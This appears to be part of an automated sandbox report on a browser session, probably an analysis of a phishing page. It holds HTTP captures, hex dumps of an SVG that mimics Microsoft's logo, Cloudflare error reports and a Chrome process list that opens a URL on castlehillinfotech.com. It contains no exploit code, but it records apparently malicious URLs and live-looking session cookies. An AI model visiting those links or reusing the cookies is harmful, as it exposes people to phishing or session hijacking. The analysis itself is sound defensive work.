                                                      2024-03-05 13:23:45 UTC291INData Raw: 33 36 2d 32 2e 33 36 33 5a 22 20 66 69 6c 6c 3d 22 23 37 33 37 33 37 33 22 2f 3e 3c 72 65 63 74 20 77 69 64 74 68 3d 22 31 30 2e 39 33 31 22 20 68 65 69 67 68 74 3d 22 31 30 2e 39 33 31 22 20 66 69 6c 6c 3d 22 23 66 32 35 30 32 32 22 2f 3e 3c 72 65 63 74 20 78 3d 22 31 32 2e 30 36 39 22 20 77 69 64 74 68 3d 22 31 30 2e 39 33 31 22 20 68 65 69 67 68 74 3d 22 31 30 2e 39 33 31 22 20 66 69 6c 6c 3d 22 23 37 66 62 61 30 30 22 2f 3e 3c 72 65 63 74 20 79 3d 22 31 32 2e 30 36 39 22 20 77 69 64 74 68 3d 22 31 30 2e 39 33 31 22 20 68 65 69 67 68 74 3d 22 31 30 2e 39 33 31 22 20 66 69 6c 6c 3d 22 23 30 30 61 34 65 66 22 2f 3e 3c 72 65 63 74 20 78 3d 22 31 32 2e 30 36 39 22 20 79 3d 22 31 32 2e 30 36 39 22 20 77 69 64 74 68 3d 22 31 30 2e 39 33 31 22 20 68 65 69 67
                                                      Data Ascii: 36-2.363Z" fill="#737373"/><rect width="10.931" height="10.931" fill="#f25022"/><rect x="12.069" width="10.931" height="10.931" fill="#7fba00"/><rect y="12.069" width="10.931" height="10.931" fill="#00a4ef"/><rect x="12.069" y="12.069" width="10.931" heig
                                                      2024-03-05 13:23:45 UTC5INData Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      45192.168.2.449793172.67.165.1054434632C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-03-05 13:23:45 UTC569OUTGET /ASSETS/img/m_.svg HTTP/1.1
                                                      Host: ampvance.com
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: cf_clearance=zNVt0U8x.8JKRgLQLJnJkGAErXxNyurSQF3gQoUIwEc-1709644996-1.0.1.1-gHAxKV.yo7SftjLGjlI1Q8Q.ZH1wpfZpyri2AnVshTgmScC9Gx7nqU9IhT36ZZSGZo6ZyZOiuFN.V7jFZl3IEg; PHPSESSID=6aa1ef9bee6ad93645932d7f3602420d
                                                      2024-03-05 13:23:45 UTC737INHTTP/1.1 200 OK
                                                      Date: Tue, 05 Mar 2024 13:23:45 GMT
                                                      Content-Type: image/svg+xml
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      cache-control: public, max-age=604800
                                                      expires: Tue, 12 Mar 2024 13:23:45 GMT
                                                      last-modified: Tue, 05 Mar 2024 10:40:37 GMT
                                                      vary: Accept-Encoding
                                                      x-turbo-charged-by: LiteSpeed
                                                      CF-Cache-Status: MISS
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=IdFJ5LZkMBtOW%2FfH6s%2F%2FZ9lYpBY1G6PVox3eSqqntFlggZ0XGv8Wds0yg9FOcGdnG8tYwGy96VKfs9SapgfVtbBlrYrviU9M%2Fk5yif54isJVh3ZgyjjbYfEjHo6QnoI%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 85fa6c21198f80d0-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      2024-03-05 13:23:45 UTC632INData Raw: 65 34 33 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 30 38 22 20 68 65 69 67 68 74 3d 22 32 34 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 38 20 32 34 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 70 61 74 68 20 64 3d 22 4d 34 34 2e 38 33 36 2c 34 2e 36 56 31 38 2e 34 68 2d 32 2e 34 56 37 2e 35 38 33 48 34 32 2e 34 4c 33 38 2e 31 31 39 2c 31 38 2e 34 48 33 36 2e 35 33 31 4c 33 32 2e 31 34 32 2c 37 2e 35 38 33 68 2d 2e 30 32 39 56 31 38 2e 34 48 32 39 2e 39 56 34 2e 36 68 33 2e 34 33 36 4c 33 37 2e 33 2c 31 34 2e 38 33 68 2e 30 35 38 4c 34 31 2e 35 34 35 2c 34 2e 36 5a 6d 32 2c 31 2e 30 34 39 61 31 2e 32 36 38 2c 31 2e
                                                      Data Ascii: e43<svg xmlns="http://www.w3.org/2000/svg" width="108" height="24" viewBox="0 0 108 24"><title>assets</title><path d="M44.836,4.6V18.4h-2.4V7.583H42.4L38.119,18.4H36.531L32.142,7.583h-.029V18.4H29.9V4.6h3.436L37.3,14.83h.058L41.545,4.6Zm2,1.049a1.268,1.
                                                      2024-03-05 13:23:45 UTC1369INData Raw: 31 38 2d 34 2e 39 30 38 2c 35 2e 36 34 31 2c 35 2e 36 34 31 2c 30 2c 30 2c 31 2c 31 2e 34 2d 33 2e 39 33 32 2c 35 2e 30 35 35 2c 35 2e 30 35 35 2c 30 2c 30 2c 31 2c 33 2e 39 35 35 2d 31 2e 35 34 35 2c 35 2e 34 31 34 2c 35 2e 34 31 34 2c 30 2c 30 2c 31 2c 31 2e 33 32 34 2e 31 36 38 2c 34 2e 34 33 31 2c 34 2e 34 33 31 2c 30 2c 30 2c 31 2c 31 2e 30 36 33 2e 33 39 76 32 2e 32 33 33 61 34 2e 37 36 33 2c 34 2e 37 36 33 2c 30 2c 30 2c 30 2d 31 2e 31 2d 2e 36 31 31 2c 33 2e 31 38 34 2c 33 2e 31 38 34 2c 30 2c 30 2c 30 2d 31 2e 31 35 2d 2e 32 31 37 2c 32 2e 39 31 39 2c 32 2e 39 31 39 2c 30 2c 30 2c 30 2d 32 2e 32 32 33 2e 39 2c 33 2e 33 37 2c 33 2e 33 37 2c 30 2c 30 2c 30 2d 2e 38 34 37 2c 32 2e 34 31 36 2c 33 2e 32 31 36 2c 33 2e 32 31 36 2c 30 2c 30 2c 30 2c 2e
                                                      Data Ascii: 18-4.908,5.641,5.641,0,0,1,1.4-3.932,5.055,5.055,0,0,1,3.955-1.545,5.414,5.414,0,0,1,1.324.168,4.431,4.431,0,0,1,1.063.39v2.233a4.763,4.763,0,0,0-1.1-.611,3.184,3.184,0,0,0-1.15-.217,2.919,2.919,0,0,0-2.223.9,3.37,3.37,0,0,0-.847,2.416,3.216,3.216,0,0,0,.
                                                      2024-03-05 13:23:45 UTC1369INData Raw: 30 32 39 2c 30 2c 30 2c 30 2d 2e 33 39 2d 2e 38 31 33 2c 35 2e 37 36 38 2c 35 2e 37 36 38 2c 30 2c 30 2c 30 2d 31 2e 34 37 37 2d 2e 37 36 35 2c 34 2e 35 36 34 2c 34 2e 35 36 34 2c 30 2c 30 2c 31 2d 31 2e 38 32 39 2d 31 2e 32 31 33 2c 32 2e 36 35 35 2c 32 2e 36 35 35 2c 30 2c 30 2c 31 2d 2e 35 33 39 2d 31 2e 37 31 33 2c 32 2e 37 30 36 2c 32 2e 37 30 36 2c 30 2c 30 2c 31 2c 31 2e 30 36 33 2d 32 2e 32 41 34 2e 32 34 33 2c 34 2e 32 34 33 2c 30 2c 30 2c 31 2c 38 31 2e 35 2c 38 2e 32 35 36 61 36 2e 36 36 33 2c 36 2e 36 36 33 2c 30 2c 30 2c 31 2c 31 2e 31 36 34 2e 31 31 35 2c 35 2e 31 36 31 2c 35 2e 31 36 31 2c 30 2c 30 2c 31 2c 31 2e 30 37 38 2e 33 76 32 2e 32 31 34 61 34 2e 39 37 34 2c 34 2e 39 37 34 2c 30 2c 30 2c 30 2d 31 2e 30 37 38 2d 2e 35 32 39 2c 33 2e
                                                      Data Ascii: 029,0,0,0-.39-.813,5.768,5.768,0,0,0-1.477-.765,4.564,4.564,0,0,1-1.829-1.213,2.655,2.655,0,0,1-.539-1.713,2.706,2.706,0,0,1,1.063-2.2A4.243,4.243,0,0,1,81.5,8.256a6.663,6.663,0,0,1,1.164.115,5.161,5.161,0,0,1,1.078.3v2.214a4.974,4.974,0,0,0-1.078-.529,3.
                                                      2024-03-05 13:23:45 UTC288INData Raw: 32 2e 33 36 33 5a 22 20 66 69 6c 6c 3d 22 23 37 33 37 33 37 33 22 2f 3e 3c 72 65 63 74 20 77 69 64 74 68 3d 22 31 30 2e 39 33 31 22 20 68 65 69 67 68 74 3d 22 31 30 2e 39 33 31 22 20 66 69 6c 6c 3d 22 23 66 32 35 30 32 32 22 2f 3e 3c 72 65 63 74 20 78 3d 22 31 32 2e 30 36 39 22 20 77 69 64 74 68 3d 22 31 30 2e 39 33 31 22 20 68 65 69 67 68 74 3d 22 31 30 2e 39 33 31 22 20 66 69 6c 6c 3d 22 23 37 66 62 61 30 30 22 2f 3e 3c 72 65 63 74 20 79 3d 22 31 32 2e 30 36 39 22 20 77 69 64 74 68 3d 22 31 30 2e 39 33 31 22 20 68 65 69 67 68 74 3d 22 31 30 2e 39 33 31 22 20 66 69 6c 6c 3d 22 23 30 30 61 34 65 66 22 2f 3e 3c 72 65 63 74 20 78 3d 22 31 32 2e 30 36 39 22 20 79 3d 22 31 32 2e 30 36 39 22 20 77 69 64 74 68 3d 22 31 30 2e 39 33 31 22 20 68 65 69 67 68 74 3d
                                                      Data Ascii: 2.363Z" fill="#737373"/><rect width="10.931" height="10.931" fill="#f25022"/><rect x="12.069" width="10.931" height="10.931" fill="#7fba00"/><rect y="12.069" width="10.931" height="10.931" fill="#00a4ef"/><rect x="12.069" y="12.069" width="10.931" height=
                                                      2024-03-05 13:23:45 UTC5INData Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      46192.168.2.44979835.190.80.14434632C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-03-05 13:24:16 UTC525OUTOPTIONS /report/v3?s=FpEbiIHEf6wt5KG8Z0z4k1xf4epHPXC5mSFiPc4k1oUlL4POmSpFgDij1iWqzJUKGexD7YWkJdjUDwIllWYM1JNOPHLGt4%2Be9EvT66KZ3Acp88ep1nGgykICUjzL5MY%3D HTTP/1.1
                                                      Host: a.nel.cloudflare.com
                                                      Connection: keep-alive
                                                      Origin: https://ampvance.com
                                                      Access-Control-Request-Method: POST
                                                      Access-Control-Request-Headers: content-type
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2024-03-05 13:24:16 UTC336INHTTP/1.1 200 OK
                                                      Content-Length: 0
                                                      access-control-max-age: 86400
                                                      access-control-allow-methods: POST, OPTIONS
                                                      access-control-allow-origin: *
                                                      access-control-allow-headers: content-length, content-type
                                                      date: Tue, 05 Mar 2024 13:24:16 GMT
                                                      Via: 1.1 google
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      47192.168.2.44979935.190.80.14434632C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-03-05 13:24:16 UTC531OUTOPTIONS /report/v3?s=IdFJ5LZkMBtOW%2FfH6s%2F%2FZ9lYpBY1G6PVox3eSqqntFlggZ0XGv8Wds0yg9FOcGdnG8tYwGy96VKfs9SapgfVtbBlrYrviU9M%2Fk5yif54isJVh3ZgyjjbYfEjHo6QnoI%3D HTTP/1.1
                                                      Host: a.nel.cloudflare.com
                                                      Connection: keep-alive
                                                      Origin: https://ampvance.com
                                                      Access-Control-Request-Method: POST
                                                      Access-Control-Request-Headers: content-type
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2024-03-05 13:24:16 UTC336INHTTP/1.1 200 OK
                                                      Content-Length: 0
                                                      access-control-max-age: 86400
                                                      access-control-allow-methods: OPTIONS, POST
                                                      access-control-allow-origin: *
                                                      access-control-allow-headers: content-length, content-type
                                                      date: Tue, 05 Mar 2024 13:24:16 GMT
                                                      Via: 1.1 google
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      48192.168.2.44980035.190.80.14434632C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-03-05 13:24:16 UTC471OUTPOST /report/v3?s=FpEbiIHEf6wt5KG8Z0z4k1xf4epHPXC5mSFiPc4k1oUlL4POmSpFgDij1iWqzJUKGexD7YWkJdjUDwIllWYM1JNOPHLGt4%2Be9EvT66KZ3Acp88ep1nGgykICUjzL5MY%3D HTTP/1.1
                                                      Host: a.nel.cloudflare.com
                                                      Connection: keep-alive
                                                      Content-Length: 1842
                                                      Content-Type: application/reports+json
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2024-03-05 13:24:16 UTC1842OUTData Raw: 5b 7b 22 61 67 65 22 3a 33 34 30 34 34 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 34 31 36 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 61 6d 70 76 61 6e 63 65 2e 63 6f 6d 2f 3f 5f 5f 63 66 5f 63 68 6c 5f 74 6b 3d 33 79 41 66 50 6a 7a 7a 39 6d 57 67 70 48 56 53 74 53 36 46 34 69 4e 78 2e 75 36 54 73 47 75 49 6f 6e 70 51 6e 31 2e 6c 75 45 67 2d 31 37 30 39 36 34 34 39 39 36 2d 30 2e 30 2e 31 2e 31 2d 31 35 35 37 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 30 34
                                                      Data Ascii: [{"age":34044,"body":{"elapsed_time":416,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://ampvance.com/?__cf_chl_tk=3yAfPjzz9mWgpHVStS6F4iNx.u6TsGuIonpQn1.luEg-1709644996-0.0.1.1-1557","sampling_fraction":1.0,"server_ip":"104
                                                      2024-03-05 13:24:16 UTC168INHTTP/1.1 200 OK
                                                      Content-Length: 0
                                                      date: Tue, 05 Mar 2024 13:24:16 GMT
                                                      Via: 1.1 google
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      49192.168.2.44980135.190.80.14434632C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-03-05 13:24:16 UTC477OUTPOST /report/v3?s=IdFJ5LZkMBtOW%2FfH6s%2F%2FZ9lYpBY1G6PVox3eSqqntFlggZ0XGv8Wds0yg9FOcGdnG8tYwGy96VKfs9SapgfVtbBlrYrviU9M%2Fk5yif54isJVh3ZgyjjbYfEjHo6QnoI%3D HTTP/1.1
                                                      Host: a.nel.cloudflare.com
                                                      Connection: keep-alive
                                                      Content-Length: 1049
                                                      Content-Type: application/reports+json
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2024-03-05 13:24:16 UTC1049OUTData Raw: 5b 7b 22 61 67 65 22 3a 35 37 39 30 35 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 36 30 39 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 37 32 2e 36 37 2e 31 36 35 2e 31 30 35 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 30 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 61 6d 70 76 61 6e 63 65 2e 63 6f
                                                      Data Ascii: [{"age":57905,"body":{"elapsed_time":609,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"","sampling_fraction":1.0,"server_ip":"172.67.165.105","status_code":400,"type":"http.error"},"type":"network-error","url":"https://ampvance.co
                                                      2024-03-05 13:24:17 UTC168INHTTP/1.1 200 OK
                                                      Content-Length: 0
                                                      date: Tue, 05 Mar 2024 13:24:16 GMT
                                                      Via: 1.1 google
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close


                                                      Click to jump to process

                                                      Click to jump to process

                                                      Click to jump to process

                                                      Target ID:0
                                                      Start time:14:23:05
                                                      Start date:05/03/2024
                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank
                                                      Imagebase:0x7ff76e190000
                                                      File size:3'242'272 bytes
                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:low
                                                      Has exited:false

                                                      Target ID:2
                                                      Start time:14:23:08
                                                      Start date:05/03/2024
                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2012 --field-trial-handle=1748,i,5136223978624495583,15776153539356877237,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                      Imagebase:0x7ff76e190000
                                                      File size:3'242'272 bytes
                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:low
                                                      Has exited:false

                                                      Target ID:3
                                                      Start time:14:23:10
                                                      Start date:05/03/2024
                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Program Files\Google\Chrome\Application\chrome.exe" "https://rfpcertstream.castlehillinfotech.com/satin/x4/cg1-b1m/
                                                      Imagebase:0x7ff76e190000
                                                      File size:3'242'272 bytes
                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:low
                                                      Has exited:true

                                                      Target ID:6
                                                      Start time:14:23:35
                                                      Start date:05/03/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7699e0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:low
                                                      Has exited:true

                                                      No disassembly